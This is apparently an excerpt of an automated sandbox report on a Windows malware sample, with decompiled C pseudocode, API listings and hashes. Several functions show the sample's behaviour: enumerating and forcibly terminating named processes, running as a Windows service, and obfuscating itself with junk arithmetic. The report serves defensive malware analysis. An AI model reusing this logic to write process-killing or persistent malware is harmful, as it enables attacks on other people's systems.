0x0039500f
0x00395014
0x0039501a
0x0039501d
0x00395025
0x0039502d
0x0039502f
0x0039503d
0x00395046
0x0039504c
0x0039504f
0x0039504f
0x00395058
0x0039505d
0x0039506c
0x00395071
0x00395076
0x0039507b
0x00395082
0x003950ac
0x003950ac
0x003950b6
0x00000000
0x0039508d
0x0039508d
0x0039508f
0x00395091
0x00395093
0x00395095
0x0039509e
0x00000000
0x00000000
0x003950a0
0x00000000
0x003950a0

APIs

Part of subcall function 0038F090: WaitForSingleObject.KERNEL32(?,00004E20,00000000,00000000,?,181DD011,?,00000000), ref: 0038F0DD

GetProcAddress.KERNEL32(76A00000,00000000), ref: 00395001
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00395067
_rand.LIBCMT ref: 003951AD
_rand.LIBCMT ref: 003951B4
_rand.LIBCMT ref: 003951BF
_rand.LIBCMT ref: 003951C6

Part of subcall function 0038CF90: _malloc.LIBCMT ref: 0038CFC7

Strings

(9|', xrefs: 00395181, 003951A4
Hl, xrefs: 00394F56, 00394F5C

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: _rand$AddressProc$ObjectSingleWait_malloc
String ID: (9|'$Hl
API String ID: 2702727532-2953293531
Opcode ID: 824e7fde54a189384090e6afe2587fafb55b7c41250ed995d18131da7409576d
Instruction ID: aef11ffc9d79a68cd914e2e2b77750caf08cae7341a281b63370b8e7e69de62d
Opcode Fuzzy Hash: 824e7fde54a189384090e6afe2587fafb55b7c41250ed995d18131da7409576d
Instruction Fuzzy Hash: 2B61DE71901604DBEB17AF60FC85F6E3BBCFB84710F614555E840E62B1EB34A8A1CB55

Uniqueness

Uniqueness Score: -1.00%

Function 003ABE5E Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 76%

			E003ABE5E(void* __ecx, void* __edx, signed int* _a4) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char* _t21;
				void* _t23;
				unsigned int _t28;
				char* _t31;
				intOrPtr* _t34;
				intOrPtr* _t35;
				intOrPtr _t36;
				unsigned int _t37;
				char* _t40;
				intOrPtr* _t42;
				signed int* _t45;
				intOrPtr _t49;
				intOrPtr* _t51;

				_t21 =  *0x3d12d0; // 0x0
				_t23 =  *_t21 - 0x58;
				if(_t23 == 0) {
					 *0x3d12d0 =  *0x3d12d0 + 1;
					_push("void");
					goto L16;
				} else {
					if(_t23 == 0) {
						_t28 =  *0x3d12e0; // 0x0
						 *0x3d12d0 =  *0x3d12d0 + 1;
						_t31 = "...";
						if(( !(_t28 >> 0x12) & 0x00000001) == 0) {
							_t31 = "<ellipsis>";
						}
						_push(_t31);
						L16:
						E003AB4D8(_a4);
						return _a4;
					} else {
						E003ABA1E(__edx,  &_v12);
						_t49 = _v8;
						if(_t49 != 0) {
							L11:
							_t34 = _a4;
							 *_t34 = _v12;
							 *((intOrPtr*)(_t34 + 4)) = _t49;
							return _t34;
						} else {
							_t35 =  *0x3d12d0; // 0x0
							_t36 =  *_t35;
							if(_t36 == 0) {
								goto L11;
							} else {
								if(_t36 == 0x40) {
									 *0x3d12d0 =  *0x3d12d0 + 1;
									goto L11;
								} else {
									if(_t36 == 0x5a) {
										_t37 =  *0x3d12e0; // 0x0
										 *0x3d12d0 =  *0x3d12d0 + 1;
										_t40 = ",...";
										if(( !(_t37 >> 0x12) & 0x00000001) == 0) {
											_t40 = ",<ellipsis>";
										}
										_t42 = E003ABC08( &_v12,  &_v20, _t40);
										_t51 = _a4;
										 *_t51 =  *_t42;
										 *((intOrPtr*)(_t51 + 4)) =  *((intOrPtr*)(_t42 + 4));
										return _t51;
									} else {
										_t45 = _a4;
										_t45[1] = _t45[1] & 0xffff00ff;
										 *_t45 =  *_t45 & 0x00000000;
										_t45[1] = 2;
										return _t45;
									}
								}
							}
						}
					}
				}
			}

0x003abe63
0x003abe6e
0x003abe71
0x003abf26
0x003abf2c
0x00000000
0x003abe77
0x003abe79
0x003abf05
0x003abf0a
0x003abf17
0x003abf1c
0x003abf1e
0x003abf1e
0x003abf23
0x003abf31
0x003abf34
0x003abf3d
0x003abe7f
0x003abe83
0x003abe89
0x003abe8e
0x003abef8
0x003abef8
0x003abefe
0x003abf00
0x003abf04
0x003abe90
0x003abe90
0x003abe95
0x003abe99
0x00000000
0x003abe9b
0x003abe9d
0x003abef2
0x00000000
0x003abe9f
0x003abea1
0x003abeb6
0x003abebb
0x003abec8
0x003abecd
0x003abecf
0x003abecf
0x003abedc
0x003abee3
0x003abee6
0x003abeeb
0x003abef1
0x003abea3
0x003abea3
0x003abea6
0x003abead
0x003abeb0
0x003abeb5
0x003abeb5
0x003abea1
0x003abe9d
0x003abe99
0x003abe8e
0x003abe79

APIs

UnDecorator::getArgumentList.LIBCMT ref: 003ABE83

Part of subcall function 003ABA1E: Replicator::operator[].LIBCMT ref: 003ABAA1
Part of subcall function 003ABA1E: DName::operator+=.LIBCMT ref: 003ABAA9

DName::operator+.LIBCMT ref: 003ABEDC
DName::DName.LIBCMT ref: 003ABF34

Strings

,..., xrefs: 003ABEC8
,<ellipsis>, xrefs: 003ABECF, 003ABED4
void, xrefs: 003ABF2C
<ellipsis>, xrefs: 003ABF1E, 003ABF23
..., xrefs: 003ABF17

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: 09d696088d0f04269e7a55d5ad0912530ad9ce10ccfeb1b6d1a4a23d3af4b925
Instruction ID: 4b0e40585dab76df08261f033cf2a1cfd2ec3b5e91845af8c18731d0e65bf61c
Opcode Fuzzy Hash: 09d696088d0f04269e7a55d5ad0912530ad9ce10ccfeb1b6d1a4a23d3af4b925
Instruction Fuzzy Hash: FD214135601244AFCB17CF5DF885EA9BBF8EB46385F058096E945DB262CB31DD02CB54

Uniqueness

Uniqueness Score: -1.00%

Function 003AD7F7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E003AD7F7(void* __edx, void* __eflags, signed int* _a4) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char* _t17;
				intOrPtr* _t20;
				void* _t23;
				void* _t26;
				signed int* _t31;
				void* _t41;

				_t41 = __edx;
				E003AB4D8( &_v12, E003AAB12(0));
				_t17 =  *0x3d12d0; // 0x0
				if( *_t17 == 0) {
					E003AB3E6( &_v12, 1);
					goto L8;
				} else {
					 *0x3d12d0 = _t17 + 1;
					_t23 =  *_t17 - 0x30;
					if(_t23 == 0) {
						E003AB9BA( &_v12, "void");
						goto L8;
					} else {
						_t26 = _t23;
						if(_t26 == 0) {
							E003AB701( &_v12, E003AD5A9(_t41, __eflags,  &_v20));
							goto L8;
						} else {
							if(_t26 != 3) {
								L8:
								E003AB9BA( &_v12, ") ");
								_t20 = _a4;
								 *_t20 = _v12;
								 *((intOrPtr*)(_t20 + 4)) = _v8;
								return _t20;
							} else {
								_t31 = _a4;
								_t31[1] = _t31[1] & 0xffff00ff;
								 *_t31 =  *_t31 & 0x00000000;
								_t31[1] = 2;
								return _t31;
							}
						}
					}
				}
			}

0x003ad7f7
0x003ad80d
0x003ad812
0x003ad81a
0x003ad871
0x00000000
0x003ad81c
0x003ad820
0x003ad827
0x003ad82a
0x003ad865
0x00000000
0x003ad82c
0x003ad82d
0x003ad82e
0x003ad856
0x00000000
0x003ad830
0x003ad833
0x003ad876
0x003ad87e
0x003ad886
0x003ad889
0x003ad88e
0x003ad892
0x003ad835
0x003ad835
0x003ad838
0x003ad83f
0x003ad842
0x003ad847
0x003ad847
0x003ad833
0x003ad82e
0x003ad82a

APIs

UnDecorator::UScore.LIBCMT ref: 003AD801
DName::DName.LIBCMT ref: 003AD80D

Part of subcall function 003AB4D8: DName::doPchar.LIBCMT ref: 003AB509

UnDecorator::getScopedName.LIBCMT ref: 003AD84C
DName::operator+=.LIBCMT ref: 003AD856
DName::operator+=.LIBCMT ref: 003AD865
DName::operator+=.LIBCMT ref: 003AD871
DName::operator+=.LIBCMT ref: 003AD87E

Strings

void, xrefs: 003AD85D

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: a7211ce761ecb9372467491596db6fd242e991cff7887f8f4fc9eb1ac493ddd1
Instruction ID: c7c7b9060c96d88948ebeba19c8ce97e4900f9516cd8125705d8b7d2c48c900d
Opcode Fuzzy Hash: a7211ce761ecb9372467491596db6fd242e991cff7887f8f4fc9eb1ac493ddd1
Instruction Fuzzy Hash: DC117071900208AFC707EF64C85ABA9BBA8EB52340F054099E0169B6A2DB74DA45C750

Uniqueness

Uniqueness Score: -1.00%

Function 003896D0 Relevance: 12.2, APIs: 8, Instructions: 173
processCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E003896D0(void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				signed int _v12;
				long long _v20;
				long _v308;
				void* _v316;
				char _v576;
				short _t33;
				signed char _t36;
				short _t37;
				void* _t43;
				int _t46;
				intOrPtr _t47;
				int _t58;
				intOrPtr _t61;
				intOrPtr _t62;
				char _t66;
				intOrPtr* _t67;
				intOrPtr _t68;
				intOrPtr _t71;
				void* _t73;
				long long _t74;
				intOrPtr _t76;
				void* _t78;
				void* _t81;
				void* _t82;
				void* _t84;
				void* _t85;
				void* _t86;
				signed int _t101;
				signed int _t112;

				_t81 = __esi;
				_t33 =  *0x3ce1c4; // 0x278e
				_t61 =  *0x3ce0e0; // 0xd349f562
				 *0x3ce1c4 =  *0x3ce1c4 - 1;
				_t2 = _t33 + 0x157080b4; // 0xe8ba7616
				_t86 = _t85 - 0x23c;
				if(_t61 + _t2 <= 0x25ca2c88) {
					_t62 =  *0x3ce5c4; // 0x7fffffff
					_v8 = _t62;
					asm("fild dword [ebp-0x4]");
					_v12 = _t101;
					asm("fsubr qword [ebp-0x8]");
					_v12 =  *0x3ce15c;
					asm("fsubr qword [ebp-0x8]");
					_v12 =  *0x3ce0a4;
					 *0x3ce098 =  *0x3ce098 * _v12;
				} else {
					 *0x3ce290 = ( *0x3ce290 & 0x0000ffff) + 0x57db9040;
				}
				_t58 = 0;
				_t78 = CreateToolhelp32Snapshot(2, 0);
				if(_t78 == 0) {
					L21:
					_t36 = E0039C990( &_v576, 0, 0x104);
					asm("fld1");
					asm("fsubp st1, st0");
					 *0x3ce420 =  *0x3ce420 -  *0x3c75c8;
					_v12 =  *0x3ce050 -  *0x3c786c -  *0x3c7868;
					_t112 =  *0x3ce420;
					asm("fsubr qword [0x3c7860]");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t36 & 0x00000005) != 0) {
						_t71 =  *0x3ce2b0; // 0xef43cad8
						_t37 =  *0x3ce1c0; // 0xa815
						_v8 = _t71;
						asm("fild dword [ebp-0x4]");
						_v8 = _t37 + 0x32db348a;
						_v20 = _t112;
						asm("fild dword [ebp-0x4]");
						_v12 = _t112;
						asm("fsubr qword [ebp-0x10]");
						 *0x3ce2b0 = E0039CABC();
						 *0x3ce1c0 =  *0x3ce1c0 - 1;
						return _t58;
					} else {
						 *0x3ce090 = 0x4000000;
						 *0x3ce094 = 0x41b993e8;
						return _t58;
					}
				} else {
					_v316 = 0x128;
					if(Process32First(_t78,  &_v316) == 0) {
						L20:
						CloseHandle(_t78);
						goto L21;
					}
					_push(_t81);
					do {
						_t43 = 0;
						do {
							_t66 =  *((intOrPtr*)(_t84 + _t43 - 0x114));
							 *((char*)(_t84 + _t43 - 0x23c)) = _t66;
							_t43 = _t43 + 1;
						} while (_t66 != 0);
						E003C2BB6( &_v576);
						_t67 = _a4;
						_t86 = _t86 + 4;
						_t46 =  &_v576;
						while(1) {
							_t73 =  *_t46;
							if(_t73 !=  *_t67) {
								break;
							}
							if(_t73 == 0) {
								L13:
								_t46 = 0;
								goto L15;
							}
							_t76 =  *((intOrPtr*)(_t46 + 1));
							_t18 = _t67 + 1; // 0xd06804c4
							if(_t76 !=  *_t18) {
								break;
							}
							_t46 = _t46 + 2;
							_t67 = _t67 + 2;
							if(_t76 != 0) {
								continue;
							}
							goto L13;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						L15:
						if(_t46 == 0) {
							_t82 = OpenProcess(1, _t46, _v308);
							if(_t82 != 0) {
								_t58 = _t58 + 1;
								_v12 =  *0x3ce420 -  *0x3ce1d8 -  *0x3c7870;
								 *0x3ce3b0 =  *0x3ce3b0 * _v12;
								TerminateProcess(_t82, 0xffffffff);
								CloseHandle(_t82);
							}
						}
						_t74 =  *0x3ce528; // 0x1aa00000
						_t47 =  *0x3ce52c; // 0xc1ef0926
						 *0x3ce1b8 = _t74;
						 *0x3ce1bc = _t47;
						_v316 = 0x128;
						 *0x3ce528 =  *0x3ce528 +  *0x3c75c8;
						_t68 =  *0x3ce028; // 0x781d
						 *0x3ce4e8 =  *0x3ce4e8 + 0xe8ebad64 - _t68;
					} while (Process32Next(_t78,  &_v316) != 0);
					goto L20;
				}
			}

0x003896d0
0x003896d3
0x003896d9
0x003896df
0x003896e7
0x003896ee
0x003896fa
0x00389710
0x00389716
0x00389719
0x0038971c
0x00389725
0x00389728
0x00389731
0x00389734
0x00389740
0x003896fc
0x00389708
0x00389708
0x00389748
0x00389753
0x00389757
0x0038989b
0x003898a9
0x003898b4
0x003898b9
0x003898cd
0x003898e5
0x003898e8
0x003898ee
0x003898f4
0x003898f7
0x003898fc
0x0038991a
0x00389920
0x00389926
0x00389929
0x00389935
0x00389938
0x0038993b
0x0038993e
0x0038994a
0x00389952
0x00389957
0x00389965
0x003898fe
0x003898ff
0x0038990b
0x00389919
0x00389919
0x0038975d
0x00389765
0x00389777
0x00389894
0x00389895
0x00000000
0x00389895
0x0038977d
0x00389780
0x00389780
0x00389790
0x00389790
0x00389797
0x0038979e
0x0038979f
0x003897aa
0x003897af
0x003897b2
0x003897b5
0x003897c0
0x003897c0
0x003897c4
0x00000000
0x00000000
0x003897c8
0x003897dc
0x003897dc
0x00000000
0x003897dc
0x003897ca
0x003897cd
0x003897d0
0x00000000
0x00000000
0x003897d2
0x003897d5
0x003897da
0x00000000
0x00000000
0x00000000
0x003897da
0x003897e0
0x003897e2
0x003897e5
0x003897e7
0x003897f9
0x003897fd
0x0038980e
0x00389815
0x00389821
0x00389827
0x0038982e
0x0038982e
0x003897fd
0x00389834
0x0038983a
0x0038983f
0x00389845
0x0038985b
0x00389865
0x0038986b
0x00389877
0x0038988b
0x00000000
0x00389893

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0038974D
Process32First.KERNEL32(00000000,?), ref: 0038976F
OpenProcess.KERNEL32(00000001,?,?,00000000), ref: 003897F3
TerminateProcess.KERNEL32(00000000,000000FF), ref: 00389827
CloseHandle.KERNEL32(00000000), ref: 0038982E
Process32Next.KERNEL32(00000000,00000128), ref: 00389885

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: ProcessProcess32$CloseCreateFirstHandleNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2114703998-0
Opcode ID: 6d383661c7fdcc66fb337defe5f65152054a1cf5894a24cd916858f5b04e0b43
Instruction ID: 955cc7ddfe3c43884d97b56a7bd27560b340d973239757ea0f66475eb3a16c31
Opcode Fuzzy Hash: 6d383661c7fdcc66fb337defe5f65152054a1cf5894a24cd916858f5b04e0b43
Instruction Fuzzy Hash: A561D370805618DBDB03AF61FC88FB97BBCFB85710F2545D6E485D22A0DB356A64CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0038D610 Relevance: 12.1, APIs: 8, Instructions: 124
registrysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0038D610() {
				signed char _v8;
				intOrPtr _v12;
				long long _v16;
				long long _v24;
				long long _t14;
				int _t17;
				intOrPtr _t18;
				signed char _t19;
				void* _t25;
				int _t26;
				signed char _t30;
				int _t31;
				intOrPtr _t35;
				intOrPtr _t36;
				signed char _t38;
				void* _t41;
				intOrPtr _t42;
				void* _t44;
				short _t45;
				char* _t46;
				int _t47;
				intOrPtr _t50;
				int _t51;
				long long _t66;

				 *0x3ce420 =  *0x3ce420 -  *0x3c75c8;
				_t14 =  *0x3ce420; // 0x5b800000
				_t35 =  *0x3ce424; // 0xc1d08110
				_v16 = _t14;
				_v12 = _t35;
				_t66 =  *0x3ce360 + _v16;
				 *0x3d02b8 = 0x30;
				 *0x3d02bc = 1;
				 *0x3d02c0 = 0;
				 *0x3ce360 = _t66;
				_t45 =  *0x3ce108; // 0x5dc4
				_t36 =  *0x3ce310; // 0x604307b9
				_t46 =  *0x3d04ac; // 0x2d81140
				 *0x3ce108 = _t36 + _t45 + 0xf1e57a6a;
				 *0x3d02c4 = 0;
				 *0x3d02c8 = 0;
				 *0x3d02cc = 0;
				 *0x3d02d0 = 0;
				_t17 = RegisterServiceCtrlHandlerA(_t46, E0038D290);
				 *0x3d0320 = _t17;
				if(_t17 != 0) {
					 *0x3d02bc = 2;
					 *0x3ce4e8 =  *0x3ce4e8 + 0xe9f5ae4f - ( *0x3ce048 & 0x0000ffff);
					_t47 =  *0x3d0320; // 0x0
					SetServiceStatus(_t47, 0x3d02b8);
					 *0x3ce4bc = 0x2a1b63df - ( *0x3ce048 & 0x0000ffff);
					_t25 = CreateEventA(0, 0, 0, 0);
					 *0x3d02c0 =  *0x3d02c0 | 0x00000005;
					 *0x3d0298 = _t25;
					_t26 =  *0x3d0320; // 0x0
					 *0x3d02bc = 4;
					SetServiceStatus(_t26, 0x3d02b8);
					 *0x3ce330 =  *0x3ce330 + 0xe05cc5a9;
					do {
						_t41 =  *0x3d0298; // 0x0
					} while (WaitForSingleObject(_t41, 0x1388) == 0x102);
					_t50 =  *0x3d0284; // 0x490
					E0038F090(_t66, _t50);
					_t30 =  *0x3ce038; // 0x80000000
					_t42 =  *0x3ce594; // 0x80000001
					_v8 = _t30;
					asm("fild dword [ebp-0x4]");
					_v8 = _t42 - 0x6430062d;
					_v24 = _t66;
					 *0x3d02bc = 3;
					asm("fild dword [ebp-0x4]");
					_v16 = _t66;
					asm("fsubr qword [ebp-0xc]");
					asm("fucompp");
					asm("fnstsw ax");
					if((_t30 & 0x00000044) == 0) {
						 *0x3ce048 = ( *0x3ce048 & 0x0000ffff) - 0x7b923dec;
					}
					_t31 =  *0x3d0320; // 0x0
					SetServiceStatus(_t31, 0x3d02b8);
					_t44 =  *0x3d0298; // 0x0
					CloseHandle(_t44);
					_t51 =  *0x3d0320; // 0x0
					 *0x3d02c0 =  *0x3d02c0 & 0xfffffffa;
					 *0x3d0298 = 0;
					 *0x3d02bc = 1;
					SetServiceStatus(_t51, 0x3d02b8);
				}
				asm("fld1");
				asm("faddp st1, st0");
				_t18 =  *0x3ce344; // 0x7f800000
				_t38 =  *0x3ce390; // 0xcd6d4fea
				_v8 = _t38;
				asm("fild dword [ebp-0x4]");
				_v12 = _t18;
				_t19 = E0039CABC();
				 *0x3ce390 = _t19;
				return _t19;
			}

0x0038d62a
0x0038d630
0x0038d635
0x0038d641
0x0038d644
0x0038d647
0x0038d64a
0x0038d654
0x0038d65e
0x0038d664
0x0038d66a
0x0038d671
0x0038d67a
0x0038d688
0x0038d68f
0x0038d695
0x0038d69b
0x0038d6a1
0x0038d6a7
0x0038d6ad
0x0038d6b4
0x0038d6cb
0x0038d6d5
0x0038d6db
0x0038d6e7
0x0038d701
0x0038d708
0x0038d70e
0x0038d715
0x0038d71a
0x0038d725
0x0038d72f
0x0038d735
0x0038d740
0x0038d740
0x0038d752
0x0038d759
0x0038d760
0x0038d765
0x0038d76a
0x0038d770
0x0038d773
0x0038d77c
0x0038d782
0x0038d785
0x0038d78f
0x0038d792
0x0038d79b
0x0038d7a1
0x0038d7a3
0x0038d7a8
0x0038d7b7
0x0038d7b7
0x0038d7be
0x0038d7c9
0x0038d7cf
0x0038d7d6
0x0038d7dc
0x0038d7e2
0x0038d7ef
0x0038d7f5
0x0038d7ff
0x0038d7ff
0x0038d80b
0x0038d80d
0x0038d815
0x0038d81a
0x0038d820
0x0038d823
0x0038d826
0x0038d82c
0x0038d831
0x0038d83a

APIs

RegisterServiceCtrlHandlerA.ADVAPI32(02D81140,Function_0000D290), ref: 0038D6A7
SetServiceStatus.ADVAPI32(00000000,003D02B8), ref: 0038D6E7
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0038D708
SetServiceStatus.ADVAPI32(00000000,003D02B8), ref: 0038D72F
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 0038D74C
SetServiceStatus.ADVAPI32(00000000,003D02B8), ref: 0038D7C9
CloseHandle.KERNEL32(00000000), ref: 0038D7D6
SetServiceStatus.ADVAPI32(00000000,003D02B8), ref: 0038D7FF

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: Service$Status$CloseCreateCtrlEventHandleHandlerObjectRegisterSingleWait
String ID:
API String ID: 3399922960-0
Opcode ID: 950732f495d6e092bdd2ee5d11e14cde0d756e0e4c7f42492ab0aec037f5a24a
Instruction ID: 8b6b89140615a5f8e8dea975bc87ff1787f55f794d475d452663450255353964
Opcode Fuzzy Hash: 950732f495d6e092bdd2ee5d11e14cde0d756e0e4c7f42492ab0aec037f5a24a
Instruction Fuzzy Hash: 425143B5902214EFC34BDF66FD89A693BBCFB48B01F10894AE445D32A4D778A954CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003900B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 174
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E003900B0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, char _a8) {
				signed int _v8;
				long long _v16;
				long long _v24;
				void* __ebp;
				signed char _t22;
				signed int _t23;
				intOrPtr _t25;
				void* _t28;
				intOrPtr* _t33;
				void* _t35;
				unsigned int _t36;
				intOrPtr _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t52;
				signed int _t53;
				intOrPtr* _t55;
				void _t56;
				signed int _t59;
				signed int _t65;
				void* _t70;
				intOrPtr _t72;
				char _t73;
				intOrPtr _t75;
				void* _t77;
				void* _t78;
				void* _t80;
				void* _t85;
				void* _t88;
				void* _t91;
				void* _t92;
				void* _t95;
				void* _t96;
				long long _t112;
				long long _t115;
				long long _t117;

				_t85 = __esi;
				_t77 = __edi;
				_t52 = __ebx;
				_t22 =  *0x3ce234; // 0x82cc2880
				_t112 =  *0x3ce0d0 +  *0x3c7910;
				_v8 = _t22;
				_v16 = _t112;
				asm("fild dword [ebp-0x4]");
				_v24 = _t112 + _v16;
				_t53 =  *0x3ce2ec; // 0x76d570f4
				 *0x3ce2ec =  *0x3ce2ec - 1;
				_v16 =  *0x3ce5c0;
				_v8 = _t53;
				asm("fild dword [ebp-0x4]");
				asm("fsubr qword [ebp-0xc]");
				asm("fcomp qword [ebp-0x14]");
				asm("fnstsw ax");
				if((_t22 & 0x00000001) == 0) {
					st0 =  *0x3ce3b8;
				}
				_t115 =  *0x3ce2a4;
				asm("fld1");
				asm("faddp st1, st0");
				 *0x3ce2a4 = _t115;
				_t23 =  *0x3ce594; // 0x80000001
				_v8 = _t23;
				asm("fild dword [ebp-0x4]");
				_v24 = _t115;
				asm("fsubr qword [ebp-0x14]");
				_v24 =  *0x3ce2a4;
				_t117 =  *0x3ce200;
				asm("fsubr qword [ebp-0x14]");
				asm("fcomp qword [0x3c7908]");
				asm("fnstsw ax");
				if((_t23 & 0x00000041) == 0) {
					_t75 =  *0x3ce37c; // 0x277c3928
					_t23 = ( *0x3ce4a8 & 0x0000ffff) - _t75;
					 *0x3ce060 = ( *0x3ce060 & 0x0000ffff) * _t23;
					 *0x3ce37c =  *0x3ce37c - 1;
				}
				if( *0x3cfb1c != 0) {
					_t70 =  *0x3d04d0; // 0x48c
					E0038F090(_t117, _t70);
					_t25 =  *0x3d095c; // 0x0
					_t92 = _t91 + 4;
					_t104 = _t25;
					if(_t25 != 0) {
						L13:
						E0039D580(_t25, _a4,  &_a8);
						_t72 =  *0x3d095c; // 0x0
						_push(_t72);
						E0039D3B9(_t52, _t72, _t77, _t85, _t110);
						L14:
						_t28 =  *0x3d04d0; // 0x48c
						return ReleaseMutex(_t28);
					}
					_push(_t85);
					_push(_t77);
					_t78 = E003960C0(0x3d0858);
					GetModuleFileNameA(0, 0x3d0858, 0x104);
					 *0x3ce1c0 = E0039CABC();
					_t121 =  *0x3ce450 -  *0x3c75c8;
					 *0x3ce450 =  *0x3ce450 -  *0x3c75c8;
					_t33 = E0038CF90(_t104,  *0x3ce450 -  *0x3c75c8, 0x3dee, 6);
					_t95 = _t92 + 0xc;
					_t55 = _t33;
					do {
						_t73 =  *_t55;
						 *((char*)(0x3d0800 + _t55)) = _t73;
						_t55 = _t55 + 1;
					} while (_t73 != 0);
					E00396570(6, _t33);
					_t15 = _t78 + 0x3d0858; // 0x3d0858
					_t35 = _t15;
					_t96 = _t95 + 8;
					_t88 = _t35;
					do {
						_t56 =  *_t35;
						_t35 = _t35 + 1;
					} while (_t56 != 0);
					_t36 = _t35 - _t88;
					_t80 = 0x3d07ff;
					do {
						_t16 = _t80 + 1; // 0x0
						_t80 = _t80 + 1;
						_t109 =  *_t16;
					} while ( *_t16 != 0);
					_t59 = _t36 >> 2;
					memcpy(_t88 + _t59 + _t59, _t88, memcpy(_t80, _t88, _t59 << 2) & 0x00000003);
					 *0x3ce014 =  *0x3ce014 - 1;
					_t39 =  *0x3ce014; // 0x0
					_t19 = _t39 + 0x7962c180; // 0x799fc9d9
					 *0x3ce5a8 = ( *0x3ce5a8 & 0x0000ffff) + _t19;
					E0039C990(0x3d0858, 0, 0x104);
					_t42 = E0038CF90(_t109, _t121, 0xbdc, 5);
					_t43 =  *0x3ce01c; // 0x9b827a58
					_t65 =  *0x3ce47c; // 0xd2bf0292
					 *0x3ce47c = _t65 * (_t43 + 0x45292e4e);
					 *0x3ce01c =  *0x3ce01c + 1;
					E0038F190(_t121, 0x3d0800, GetTickCount(), _t42);
					E00396570(5, _t42);
					 *0x3d095c = E0039D699(0x3d0800, E0038CF90(_t109, _t121, 0xf56, 3));
					E00396570(3, _t48);
					_t25 =  *0x3d095c; // 0x0
					_t92 = _t96 + 0x58;
					_pop(_t77);
					_pop(_t85);
					_t110 = _t25;
					if(_t25 == 0) {
						goto L14;
					}
					goto L13;
				}
				return _t23;
			}

0x003900b0
0x003900b0
0x003900b0
0x003900bc
0x003900c1
0x003900c7
0x003900ca
0x003900cd
0x003900d3
0x003900dc
0x003900e2
0x003900e8
0x003900eb
0x003900ee
0x003900f1
0x003900f4
0x003900f7
0x003900fc
